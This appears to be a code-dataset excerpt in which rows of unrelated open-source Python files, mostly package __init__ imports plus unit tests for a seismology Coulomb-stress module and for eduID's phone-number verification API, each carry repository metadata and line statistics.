return self.mu(x), self.logvar(x) | 34.405797 | 95 | 0.595619 | 520 | 4,748 | 5.359615 | 0.234615 | 0.043057 | 0.064586 | 0.049516 | 0.876929 | 0.876929 | 0.876929 | 0.876929 | 0.860423 | 0.860423 | 0 | 0.012473 | 0.324558 | 4,748 | 138 | 96 | 34.405797 | 0.856564 | 0.381634 | 0 | 0.815789 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.043478 | 0 | 1 | 0.052632 | false | 0 | 0.065789 | 0 | 0.171053 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
ee8086f0c7dbfe5f769c17499d8be4b66fd6d7b8 | 226 | py | Python | rhea/cores/memmap/__init__.py | meetps/rhea | f8a9a08fb5e14c5c4488ef68a2dff4d18222c2c0 | [
"MIT"
] | 1 | 2022-03-16T23:56:09.000Z | 2022-03-16T23:56:09.000Z | rhea/cores/memmap/__init__.py | meetps/rhea | f8a9a08fb5e14c5c4488ef68a2dff4d18222c2c0 | [
"MIT"
] | null | null | null | rhea/cores/memmap/__init__.py | meetps/rhea | f8a9a08fb5e14c5c4488ef68a2dff4d18222c2c0 | [
"MIT"
] | null | null | null |
from .memmap_controller import memmap_controller_basic
from .memmap_peripheral import memmap_peripheral_memory
from .memmap_peripheral import memmap_peripheral_regfile
from .memmap_command_bridge import memmap_command_bridge
| 37.666667 | 56 | 0.90708 | 29 | 226 | 6.62069 | 0.344828 | 0.208333 | 0.208333 | 0.270833 | 0.4375 | 0.4375 | 0 | 0 | 0 | 0 | 0 | 0 | 0.075221 | 226 | 5 | 57 | 45.2 | 0.91866 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
c9ce98d984cebb79544873075a8af1f42c30e55f | 596 | py | Python | app/back/mongo/data/collect/__init__.py | jgphilpott/polyplot | c46861174ee5881dadffbfb2278d555462523547 | [
"MIT"
] | 5 | 2021-05-17T14:17:14.000Z | 2021-12-14T12:54:32.000Z | app/back/mongo/data/collect/__init__.py | jgphilpott/iGraph | 2a91ba57e4950856a83d3a109753f8f2badee829 | [
"MIT"
] | 8 | 2020-02-09T02:48:41.000Z | 2021-05-16T04:57:02.000Z | app/back/mongo/data/collect/__init__.py | jgphilpott/iGraph | 2a91ba57e4950856a83d3a109753f8f2badee829 | [
"MIT"
] | 2 | 2016-09-12T03:48:16.000Z | 2019-05-04T14:15:19.000Z | from back.mongo.data.collect.airports import *
from back.mongo.data.collect.cities import *
from back.mongo.data.collect.clients import *
from back.mongo.data.collect.countries import *
from back.mongo.data.collect.graticules import *
from back.mongo.data.collect.indicators import *
from back.mongo.data.collect.lakes import *
from back.mongo.data.collect.maps import *
from back.mongo.data.collect.metas import *
from back.mongo.data.collect.ports import *
from back.mongo.data.collect.railroads import *
from back.mongo.data.collect.rivers import *
from back.mongo.data.collect.roads import *
| 42.571429 | 48 | 0.803691 | 91 | 596 | 5.263736 | 0.208791 | 0.217119 | 0.352818 | 0.461378 | 0.80167 | 0.751566 | 0 | 0 | 0 | 0 | 0 | 0 | 0.087248 | 596 | 13 | 49 | 45.846154 | 0.880515 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
c9e3c9a90b26f393704e8ebd81019636d1563faf | 145 | py | Python | actioneer/__init__.py | vbe0201/Actioneer | 96df066ea40d2a51b1abb4bde2504af23c2c7c82 | [
"MIT"
] | null | null | null | actioneer/__init__.py | vbe0201/Actioneer | 96df066ea40d2a51b1abb4bde2504af23c2c7c82 | [
"MIT"
] | null | null | null | actioneer/__init__.py | vbe0201/Actioneer | 96df066ea40d2a51b1abb4bde2504af23c2c7c82 | [
"MIT"
] | null | null | null | """TODO: Description here"""
from .action import *
from .argument import *
from .errors import *
from .performer import *
from .utils import *
| 16.111111 | 28 | 0.710345 | 18 | 145 | 5.722222 | 0.555556 | 0.38835 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.172414 | 145 | 8 | 29 | 18.125 | 0.858333 | 0.151724 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.125 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
a005246b0a136e44579b6cbf5af01f3da0db58fc | 87 | py | Python | ImageClassifier/__init__.py | pranav377/image-classifier | f3f83fcb5ba971c40b1c4bc94c0805422a2c3d7a | [
"MIT"
] | 4 | 2021-02-10T07:16:29.000Z | 2021-11-16T20:56:04.000Z | ImageClassifier/__init__.py | pranav377/image-classifier | f3f83fcb5ba971c40b1c4bc94c0805422a2c3d7a | [
"MIT"
] | null | null | null | ImageClassifier/__init__.py | pranav377/image-classifier | f3f83fcb5ba971c40b1c4bc94c0805422a2c3d7a | [
"MIT"
] | null | null | null | from ImageClassifier.img import CreateDataAndModel
from ImageClassifier.img import Run | 43.5 | 51 | 0.885057 | 10 | 87 | 7.7 | 0.6 | 0.493506 | 0.571429 | 0.727273 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.091954 | 87 | 2 | 52 | 43.5 | 0.974684 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
4ecec012951a83217e780a21ed662a1f31606176 | 3,082 | py | Python | seistools/tests/coulomb_test.py | egdaub/seistools | 9ec61de03c2231760dba6a42e7fa2018309a99f3 | [
"MIT"
] | 2 | 2021-04-18T03:28:24.000Z | 2021-11-19T12:32:31.000Z | seistools/tests/coulomb_test.py | egdaub/seistools | 9ec61de03c2231760dba6a42e7fa2018309a99f3 | [
"MIT"
] | null | null | null | seistools/tests/coulomb_test.py | egdaub/seistools | 9ec61de03c2231760dba6a42e7fa2018309a99f3 | [
"MIT"
] | 2 | 2021-04-18T03:28:26.000Z | 2022-01-05T03:17:52.000Z | from unittest import TestCase
import numpy as np
import seistools.coulomb
class TestCoulomb(TestCase):
def test_tangent_2d(self):
self.assertIs(type(seistools.coulomb.tangent_2d((1., 0.))), np.ndarray)
np.testing.assert_array_almost_equal_nulp(seistools.coulomb.tangent_2d((1., 0.)), np.array([0., 1.]))
np.testing.assert_array_almost_equal_nulp(seistools.coulomb.tangent_2d((0., 1.)), np.array([-1., 0.]))
np.testing.assert_array_almost_equal_nulp(seistools.coulomb.tangent_2d((1./np.sqrt(2.), 1./np.sqrt(2.))),
np.array([-1./np.sqrt(2.), 1./np.sqrt(2.)]))
np.testing.assert_array_almost_equal_nulp(seistools.coulomb.tangent_2d((1./np.sqrt(2.), -1./np.sqrt(2.))),
np.array([1./np.sqrt(2.), 1./np.sqrt(2.)]))
self.assertRaises(AssertionError, seistools.coulomb.tangent_2d, (1.,))
self.assertRaises(AssertionError, seistools.coulomb.tangent_2d, (1., 0., 0.))
self.assertRaises(AssertionError, seistools.coulomb.tangent_2d, (0.5, 0.))
def test_rotate_xy2nt_2d(self):
np.testing.assert_array_almost_equal_nulp(np.array(seistools.coulomb.rotate_xy2nt_2d(1., 1., 0., (1., 0.))),
np.array((1., 1.)))
np.testing.assert_array_almost_equal_nulp(np.array(seistools.coulomb.rotate_xy2nt_2d(0., 1., 1., (0., 1.))),
np.array((1., -1.)))
np.testing.assert_array_almost_equal_nulp(np.array(seistools.coulomb.rotate_xy2nt_2d(-1., 0.5, -1.,
(1./np.sqrt(2.), 1./np.sqrt(2.)))),
np.array((-0.5, 0.)))
self.assertRaises(AssertionError, seistools.coulomb.rotate_xy2nt_2d, 1., 0., 0., (1., 0., 0.))
self.assertRaises(AssertionError, seistools.coulomb.rotate_xy2nt_2d, 1., 0., 0., (1., 1.))
self.assertRaises(AssertionError, seistools.coulomb.rotate_xy2nt_2d, 1., 0., 0., (1.,))
def test_coulomb_2d(self):
np.testing.assert_array_almost_equal_nulp(np.array(seistools.coulomb.coulomb_2d(1., 1., 0., (1., 0.), 0.5)),
np.array(1.5))
np.testing.assert_array_almost_equal_nulp(np.array(seistools.coulomb.coulomb_2d(0., 1., 1., (0., 1.), 0.2)),
np.array((-0.8)))
np.testing.assert_array_almost_equal_nulp(np.array(seistools.coulomb.coulomb_2d(-1., 0.5, -1.,
(1./np.sqrt(2.), 1./np.sqrt(2.)), 1.)), np.array(-0.5))
self.assertRaises(AssertionError, seistools.coulomb.coulomb_2d, 1., 0., 0., (1., 0., 0.), 0.)
self.assertRaises(AssertionError, seistools.coulomb.coulomb_2d, 1., 0., 0., (1., 1.), 0.)
self.assertRaises(AssertionError, seistools.coulomb.coulomb_2d, 1., 0., 0., (1.,), 0.)
self.assertRaises(AssertionError, seistools.coulomb.coulomb_2d, 1., 0., 0., (1., 0.), -1.)
| 70.045455 | 137 | 0.570733 | 407 | 3,082 | 4.140049 | 0.085995 | 0.029674 | 0.028487 | 0.056973 | 0.880119 | 0.872997 | 0.859941 | 0.835015 | 0.738872 | 0.738872 | 0 | 0.068172 | 0.252758 | 3,082 | 43 | 138 | 71.674419 | 0.663482 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.567568 | 1 | 0.081081 | false | 0 | 0.081081 | 0 | 0.189189 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
14f0824001f673f1c1a8110df361da0210d74056 | 173 | py | Python | finmarketpy/curve/__init__.py | Joukahainen/finmarketpy | 59e340e1411edceba121a0943fb500d8bda2c6f2 | [
"Apache-2.0"
] | 1,701 | 2016-08-17T15:45:40.000Z | 2022-03-30T14:05:21.000Z | finmarketpy/curve/__init__.py | Joukahainen/finmarketpy | 59e340e1411edceba121a0943fb500d8bda2c6f2 | [
"Apache-2.0"
] | 26 | 2017-01-09T18:54:27.000Z | 2021-06-29T15:32:03.000Z | finmarketpy/curve/__init__.py | Joukahainen/finmarketpy | 59e340e1411edceba121a0943fb500d8bda2c6f2 | [
"Apache-2.0"
] | 342 | 2016-09-01T11:36:00.000Z | 2022-03-27T00:56:55.000Z | from finmarketpy.curve.abstractcurve import AbstractCurve
from finmarketpy.curve.fxforwardscurve import FXForwardsCurve
from finmarketpy.curve.fxspotcurve import FXSpotCurve | 57.666667 | 61 | 0.901734 | 18 | 173 | 8.666667 | 0.388889 | 0.288462 | 0.384615 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.063584 | 173 | 3 | 62 | 57.666667 | 0.962963 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
14feeb412612f302ccd876cc5f15b9cb471f3d18 | 30,776 | py | Python | src/eduid_webapp/phone/tests/test_app.py | SUNET/eduid-webapp | 8e531f288d50d18a5c9182003fff2ab6670a44c3 | [
"BSD-3-Clause"
] | null | null | null | src/eduid_webapp/phone/tests/test_app.py | SUNET/eduid-webapp | 8e531f288d50d18a5c9182003fff2ab6670a44c3 | [
"BSD-3-Clause"
] | 161 | 2017-04-13T07:56:38.000Z | 2021-03-12T13:46:38.000Z | src/eduid_webapp/phone/tests/test_app.py | SUNET/eduid-webapp | 8e531f288d50d18a5c9182003fff2ab6670a44c3 | [
"BSD-3-Clause"
] | 3 | 2016-05-16T20:25:49.000Z | 2018-07-27T12:10:58.000Z | # -*- coding: utf-8 -*-
#
# Copyright (c) 2016 NORDUnet A/S
# Copyright (c) 2018 SUNET
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or
# without modification, are permitted provided that the following
# conditions are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# 3. Neither the name of the NORDUnet nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
import json
from typing import Any, Dict, Mapping, Optional
from urllib.parse import quote_plus
from mock import patch
from eduid_common.api.testing import EduidAPITestCase
from eduid_webapp.phone.app import PhoneApp, phone_init_app
from eduid_webapp.phone.helpers import PhoneMsg
class PhoneTests(EduidAPITestCase):
app: PhoneApp
def setUp(self):
super(PhoneTests, self).setUp(copy_user_to_private=True)
def load_app(self, config: Mapping[str, Any]) -> PhoneApp:
"""
Called from the parent class, so we can provide the appropriate flask
app for this test case.
"""
return phone_init_app('testing', config)
def update_config(self, config: Dict[str, Any]) -> Dict[str, Any]:
config.update(
{
'available_languages': {'en': 'English', 'sv': 'Svenska'},
'msg_broker_url': 'amqp://dummy',
'am_broker_url': 'amqp://dummy',
'celery_config': {'result_backend': 'amqp', 'task_serializer': 'json'},
'phone_verification_timeout': 7200,
'default_country_code': '46',
'throttle_resend_seconds': 300,
}
)
return config
# parameterized test methods
def _get_all_phone(self, eppn: Optional[str] = None):
"""
GET all phone data for some user
:param eppn: eppn for the user
"""
response = self.browser.get('/all')
self.assertEqual(response.status_code, 302) # Redirect to token service
eppn = eppn or self.test_user_data['eduPersonPrincipalName']
with self.session_cookie(self.browser, eppn) as client:
response2 = client.get('/all')
return json.loads(response2.data)
@patch('eduid_common.api.am.AmRelay.request_user_sync')
@patch('eduid_webapp.phone.verifications.get_short_hash')
@patch('eduid_common.api.msg.MsgRelay.sendsms')
def _post_phone(
self,
mock_phone_validator: Any,
mock_code_verification: Any,
mock_request_user_sync: Any,
mod_data: Optional[dict] = None,
send_data: bool = True,
):
"""
POST phone data to add a new phone number to the test user
:param mod_data: to control what data is POSTed
:param send_data: whether to POST any data at all
"""
mock_phone_validator.return_value = True
mock_code_verification.return_value = u'5250f9a4'
mock_request_user_sync.side_effect = self.request_user_sync
eppn = self.test_user_data['eduPersonPrincipalName']
with self.session_cookie(self.browser, eppn) as client:
with self.app.test_request_context():
with client.session_transaction() as sess:
data = {
'number': '+34670123456',
'verified': False,
'primary': False,
'csrf_token': sess.get_csrf_token(),
}
if mod_data:
data.update(mod_data)
if send_data:
return client.post('/new', data=json.dumps(data), content_type=self.content_type_json)
return client.post('/new')
@patch('eduid_common.api.am.AmRelay.request_user_sync')
def _post_primary(self, mock_request_user_sync: Any, mod_data: Optional[dict] = None):
"""
Set phone number as the primary number for the test user
:param mod_data: to control what data is POSTed
"""
mock_request_user_sync.side_effect = self.request_user_sync
response = self.browser.post('/primary')
self.assertEqual(response.status_code, 302) # Redirect to token service
eppn = self.test_user_data['eduPersonPrincipalName']
with self.session_cookie(self.browser, eppn) as client:
with self.app.test_request_context():
with client.session_transaction() as sess:
data = {'number': '+34609609609', 'csrf_token': sess.get_csrf_token()}
if mod_data:
data.update(mod_data)
return client.post('/primary', data=json.dumps(data), content_type=self.content_type_json)
@patch('eduid_common.api.am.AmRelay.request_user_sync')
def _remove(self, mock_request_user_sync: Any, mod_data: Optional[dict] = None):
"""
Remove phone number from the test user
:param mod_data: to control what data is POSTed
"""
mock_request_user_sync.side_effect = self.request_user_sync
response = self.browser.post('/remove')
self.assertEqual(response.status_code, 302) # Redirect to token service
eppn = self.test_user_data['eduPersonPrincipalName']
with self.session_cookie(self.browser, eppn) as client:
with self.app.test_request_context():
with client.session_transaction() as sess:
data = {'number': '+34609609609', 'csrf_token': sess.get_csrf_token()}
if mod_data:
data.update(mod_data)
return client.post('/remove', data=json.dumps(data), content_type=self.content_type_json)
@patch('eduid_webapp.phone.verifications.get_short_hash')
@patch('eduid_common.api.am.AmRelay.request_user_sync')
@patch('eduid_common.api.msg.MsgRelay.sendsms')
def _resend_code(
self,
mock_phone_validator: Any,
mock_request_user_sync: Any,
mock_code_verification: Any,
mod_data: Optional[dict] = None,
):
"""
Send a POST request to trigger re-sending a verification code for an unverified phone number in the test user.
:param mod_data: to control the data to be POSTed
"""
mock_phone_validator.return_value = True
mock_request_user_sync.side_effect = self.request_user_sync
mock_code_verification.return_value = u'5250f9a4'
eppn = self.test_user_data['eduPersonPrincipalName']
with self.session_cookie(self.browser, eppn) as client:
with self.app.test_request_context():
with client.session_transaction() as sess:
data = {'number': '+34609609609', 'csrf_token': sess.get_csrf_token()}
if mod_data:
data.update(mod_data)
return client.post('/resend-code', data=json.dumps(data), content_type=self.content_type_json)
@patch('eduid_common.api.am.AmRelay.request_user_sync')
@patch('eduid_webapp.phone.verifications.get_short_hash')
@patch('eduid_common.api.msg.MsgRelay.sendsms')
def _get_code_backdoor(
self,
mock_phone_validator: Any,
mock_code_verification: Any,
mock_request_user_sync: Any,
mod_data: Optional[dict] = None,
phone: str = '+34670123456',
code: str = '5250f9a4',
):
"""
POST phone data to generate a verification state,
and try to get the generated code through the backdoor
:param mod_data: to control what data is POSTed
:param phone: the phone to use
:param code: mock verification code
"""
mock_phone_validator.return_value = True
mock_code_verification.return_value = code
mock_request_user_sync.side_effect = self.request_user_sync
eppn = self.test_user_data['eduPersonPrincipalName']
with self.session_cookie(self.browser, eppn) as client:
with self.app.test_request_context():
with client.session_transaction() as sess:
data = {
'number': phone,
'verified': False,
'primary': False,
'csrf_token': sess.get_csrf_token(),
}
if mod_data:
data.update(mod_data)
client.post('/new', data=json.dumps(data), content_type=self.content_type_json)
client.set_cookie('localhost', key=self.app.conf.magic_cookie_name, value=self.app.conf.magic_cookie)
phone = quote_plus(phone)
eppn = quote_plus(eppn)
return client.get(f'/get-code?phone={phone}&eppn={eppn}')
# actual tests
def test_get_all_phone(self):
phone_data = self._get_all_phone()
self.assertEqual('GET_PHONE_ALL_SUCCESS', phone_data['type'])
self.assertIsNotNone(phone_data['payload']['csrf_token'])
self.assertEqual('+34609609609', phone_data['payload']['phones'][0].get('number'))
self.assertEqual(True, phone_data['payload']['phones'][0].get('primary'))
self.assertEqual('+34 6096096096', phone_data['payload']['phones'][1].get('number'))
self.assertEqual(False, phone_data['payload']['phones'][1].get('primary'))
def test_post_phone_error_no_data(self):
response = self._post_phone(send_data=False)
new_phone_data = json.loads(response.data)
self.assertEqual('POST_PHONE_NEW_FAIL', new_phone_data['type'])
def test_post_phone_country_code(self):
response = self.browser.post('/new')
self.assertEqual(response.status_code, 302) # Redirect to token service
response = self._post_phone()
self.assertEqual(response.status_code, 200)
new_phone_data = json.loads(response.data)
self.assertEqual('POST_PHONE_NEW_SUCCESS', new_phone_data['type'])
self.assertEqual(u'+34670123456', new_phone_data['payload']['phones'][2].get('number'))
self.assertEqual(False, new_phone_data['payload']['phones'][2].get('verified'))
def test_post_phone_no_country_code(self):
data = {'number': '0701234565'}
response = self._post_phone(mod_data=data)
self.assertEqual(response.status_code, 200)
new_phone_data = json.loads(response.data)
self.assertEqual('POST_PHONE_NEW_SUCCESS', new_phone_data['type'])
self.assertEqual(u'+46701234565', new_phone_data['payload']['phones'][2].get('number'))
self.assertEqual(False, new_phone_data['payload']['phones'][2].get('verified'))
def test_post_phone_wrong_csrf(self):
data = {'csrf_token': 'wrong-token'}
response = self._post_phone(mod_data=data)
self.assertEqual(response.status_code, 200)
new_phone_data = json.loads(response.data)
self.assertEqual('POST_PHONE_NEW_FAIL', new_phone_data['type'])
self.assertEqual(['CSRF failed to validate'], new_phone_data['payload']['error']['csrf_token'])
def test_post_phone_invalid(self):
data = {'number': '0'}
response = self._post_phone(mod_data=data)
self.assertEqual(response.status_code, 200)
new_phone_data = json.loads(response.data)
self.assertEqual('POST_PHONE_NEW_FAIL', new_phone_data['type'])
self.assertEqual(['phone.phone_format'], new_phone_data['payload']['error']['number'])
def test_post_phone_as_verified(self):
data = {'verified': True}
response = self._post_phone(mod_data=data)
self.assertEqual(response.status_code, 200)
new_phone_data = json.loads(response.data)
self.assertEqual('POST_PHONE_NEW_SUCCESS', new_phone_data['type'])
self.assertEqual(u'+34670123456', new_phone_data['payload']['phones'][2].get('number'))
self.assertFalse(new_phone_data['payload']['phones'][2].get('verified'))
self.assertFalse(new_phone_data['payload']['phones'][2].get('primary'))
def test_post_phone_as_primary(self):
data = {'primary': True}
response = self._post_phone(mod_data=data)
self.assertEqual(response.status_code, 200)
new_phone_data = json.loads(response.data)
self.assertEqual('POST_PHONE_NEW_SUCCESS', new_phone_data['type'])
self.assertEqual(u'+34670123456', new_phone_data['payload']['phones'][2].get('number'))
self.assertFalse(new_phone_data['payload']['phones'][2].get('verified'))
self.assertFalse(new_phone_data['payload']['phones'][2].get('primary'))
def test_post_phone_bad_swedish_mobile(self):
data = {'number': '0711234565'}
response = self._post_phone(mod_data=data)
self.assertEqual(response.status_code, 200)
new_phone_data = json.loads(response.data)
self.assertEqual('POST_PHONE_NEW_FAIL', new_phone_data['type'])
self.assertEqual(['phone.swedish_mobile_format'], new_phone_data['payload']['error'].get('number'))
def test_post_phone_bad_country_code(self):
data = {'number': '00711234565'}
response = self._post_phone(mod_data=data)
self.assertEqual(response.status_code, 200)
new_phone_data = json.loads(response.data)
self.assertEqual('POST_PHONE_NEW_FAIL', new_phone_data['type'])
self.assertEqual(['phone.e164_format'], new_phone_data['payload']['error'].get('_schema'))
def test_post_primary(self):
response = self._post_primary()
self.assertEqual(response.status_code, 200)
new_phone_data = json.loads(response.data)
self.assertEqual('POST_PHONE_PRIMARY_SUCCESS', new_phone_data['type'])
self.assertEqual(True, new_phone_data['payload']['phones'][0]['verified'])
self.assertEqual(True, new_phone_data['payload']['phones'][0]['primary'])
self.assertEqual(u'+34609609609', new_phone_data['payload']['phones'][0]['number'])
self.assertEqual(False, new_phone_data['payload']['phones'][1]['verified'])
self.assertEqual(False, new_phone_data['payload']['phones'][1]['primary'])
self.assertEqual(u'+34 6096096096', new_phone_data['payload']['phones'][1]['number'])
def test_post_primary_no_csrf(self):
data = {'csrf_token': ''}
response = self._post_primary(mod_data=data)
self.assertEqual(response.status_code, 200)
new_phone_data = json.loads(response.data)
self.assertEqual('POST_PHONE_PRIMARY_FAIL', new_phone_data['type'])
self.assertEqual(['CSRF failed to validate'], new_phone_data['payload']['error']['csrf_token'])
def test_post_primary_unknown(self):
data = {'number': '+66666666666'}
response = self._post_primary(mod_data=data)
self.assertEqual(response.status_code, 200)
new_phone_data = json.loads(response.data)
self.assertEqual('POST_PHONE_PRIMARY_FAIL', new_phone_data['type'])
self.assertEqual(PhoneMsg.unknown_phone.value, new_phone_data['payload']['message'])
def test_remove(self):
response = self._remove()
self.assertEqual(response.status_code, 200)
delete_phone_data = json.loads(response.data)
self.assertEqual('POST_PHONE_REMOVE_SUCCESS', delete_phone_data['type'])
self.assertEqual(u'+34 6096096096', delete_phone_data['payload']['phones'][0].get('number'))
def test_remove_primary_other_unverified(self):
data = {'number': '+34 6096096096'}
response = self._remove(mod_data=data)
self.assertEqual(response.status_code, 200)
delete_phone_data = json.loads(response.data)
self.assertEqual('POST_PHONE_REMOVE_SUCCESS', delete_phone_data['type'])
self.assertEqual(u'+34609609609', delete_phone_data['payload']['phones'][0].get('number'))
def test_remove_no_csrf(self):
data = {'csrf_token': ''}
response = self._remove(mod_data=data)
self.assertEqual(response.status_code, 200)
delete_phone_data = json.loads(response.data)
self.assertEqual('POST_PHONE_REMOVE_FAIL', delete_phone_data['type'])
self.assertEqual(['CSRF failed to validate'], delete_phone_data['payload']['error']['csrf_token'])
def test_remove_unknown(self):
data = {'number': '+33333333333'}
response = self._remove(mod_data=data)
self.assertEqual(response.status_code, 200)
delete_phone_data = json.loads(response.data)
self.assertEqual('POST_PHONE_REMOVE_FAIL', delete_phone_data['type'])
self.assertEqual('phones.unknown_phone', delete_phone_data['payload']['message'])
@patch('eduid_common.api.am.AmRelay.request_user_sync')
@patch('eduid_webapp.phone.verifications.get_short_hash')
@patch('eduid_common.api.msg.MsgRelay.sendsms')
def test_remove_primary_other_verified(self, mock_phone_validator, mock_code_verification, mock_request_user_sync):
mock_phone_validator.return_value = True
mock_request_user_sync.side_effect = self.request_user_sync
mock_code_verification.return_value = u'12345'
response = self.browser.post('/remove')
self.assertEqual(response.status_code, 302) # Redirect to token service
eppn = self.test_user_data['eduPersonPrincipalName']
with self.session_cookie(self.browser, eppn) as client:
with self.app.test_request_context():
with client.session_transaction() as sess:
data = {
'number': u'+34609123321',
'verified': False,
'primary': False,
'csrf_token': sess.get_csrf_token(),
}
client.post('/new', data=json.dumps(data), content_type=self.content_type_json)
with self.app.test_request_context():
with client.session_transaction() as sess:
data = {'number': u'+34609123321', 'code': u'12345', 'csrf_token': sess.get_csrf_token()}
response2 = client.post('/verify', data=json.dumps(data), content_type=self.content_type_json)
verify_phone_data = json.loads(response2.data)
self.assertEqual('POST_PHONE_VERIFY_SUCCESS', verify_phone_data['type'])
with self.app.test_request_context():
with client.session_transaction() as sess:
data = {'number': '+34609609609', 'csrf_token': sess.get_csrf_token()}
response2 = client.post('/remove', data=json.dumps(data), content_type=self.content_type_json)
self.assertEqual(response2.status_code, 200)
delete_phone_data = json.loads(response2.data)
self.assertEqual('POST_PHONE_REMOVE_SUCCESS', delete_phone_data['type'])
self.assertEqual(u'+34 6096096096', delete_phone_data['payload']['phones'][0].get('number'))
def test_resend_code(self):
response = self.browser.post('/resend-code')
self.assertEqual(response.status_code, 302) # Redirect to token service
response = self._resend_code()
self.assertEqual(response.status_code, 200)
phone_data = json.loads(response.data)
self.assertEqual('POST_PHONE_RESEND_CODE_SUCCESS', phone_data['type'])
self.assertEqual(u'+34609609609', phone_data['payload']['phones'][0].get('number'))
self.assertEqual(u'+34 6096096096', phone_data['payload']['phones'][1].get('number'))
def test_resend_code_no_csrf(self):
data = {'csrf_token': 'wrong-token'}
response = self._resend_code(mod_data=data)
self.assertEqual(response.status_code, 200)
phone_data = json.loads(response.data)
self.assertEqual('POST_PHONE_RESEND_CODE_FAIL', phone_data['type'])
self.assertEqual(['CSRF failed to validate'], phone_data['payload']['error']['csrf_token'])
def test_resend_code_unknown(self):
data = {'number': '+66666666666'}
response = self._resend_code(mod_data=data)
self.assertEqual(response.status_code, 200)
phone_data = json.loads(response.data)
self.assertEqual('POST_PHONE_RESEND_CODE_FAIL', phone_data['type'])
self.assertEqual('user-out-of-sync', phone_data['payload']['message'])
def test_resend_code_throttle(self):
response = self._resend_code()
self.assertEqual(response.status_code, 200)
phone_data = json.loads(response.data)
self.assertEqual('POST_PHONE_RESEND_CODE_SUCCESS', phone_data['type'])
self.assertEqual(u'+34609609609', phone_data['payload']['phones'][0].get('number'))
self.assertEqual(u'+34 6096096096', phone_data['payload']['phones'][1].get('number'))
response = self._resend_code()
self.assertEqual(response.status_code, 200)
phone_data = json.loads(response.data)
self.assertEqual('POST_PHONE_RESEND_CODE_FAIL', phone_data['type'])
